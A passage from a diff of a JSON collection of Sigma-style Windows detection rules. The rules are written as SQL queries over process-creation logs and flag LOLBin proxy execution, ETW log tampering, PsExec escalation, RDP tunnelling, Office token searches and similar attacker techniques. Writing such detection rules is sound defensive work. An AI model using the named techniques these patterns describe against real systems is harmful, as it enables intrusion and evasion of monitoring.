'4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "title": "DLL Execution via Rasautou.exe", + "id": "cd3d1298-eb3b-476c-ac67-12847de55813", "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. 
before log collection agent installation" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", - "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE 
'%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Lolbin Unregmp2.exe Use As Proxy", - "id": "727454c0-d851-48b0-8b89-385611ab0704", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "status": "experimental", - "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", - "author": "frack113", + "description": "Office application called wmic to proxye execution through a LOLBIN process. 
This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_unregmp2.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "Renamed ProcDump Execution", - "id": 
"4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", + "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1562.004" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "Legitimate administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "title": "Suspicious AgentExecutor PowerShell Execution", + 
"id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "CL_LoadAssembly.ps1 Proxy Execution", - "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "title": "Add User to Local Administrators Group", + "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands and 
bypassing AppLocker.", - "author": "frack113", + "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" + "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" }, { - "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", - "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "title": "Hidden Powershell in Link File Pattern", + "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "status": "test", - "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", - "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", + "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "author": "frack113", "tags": [ - "attack.t1218", - "attack.defense_evasion" + 
"attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "The process spawned by vsjitdebugger.exe is uncommon." + "Legitimate commands in .lnk files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" + "filename": "proc_creation_win_susp_embed_exe_lnk.yml" }, { - "title": "Active Directory Structure Export Via Csvde.EXE", - "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", + "title": "Suspicious Office Token Search Via CLI", + "id": "6d3a3952-6530-44a3-8554-cf17c116c615", "status": "experimental", - "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". 
This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csvde_export.yml" + "filename": "proc_creation_win_susp_office_token_search.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", - "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", + "status": "experimental", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR 
CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR 
OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", + "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", - "author": "Florian Roth (Nextron Systems)", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" }, { - 
"title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "Use of Squirrel.exe", + "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", + "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i 
pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE 
'%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_lolbin_squirrel.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", + "status": "experimental", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' 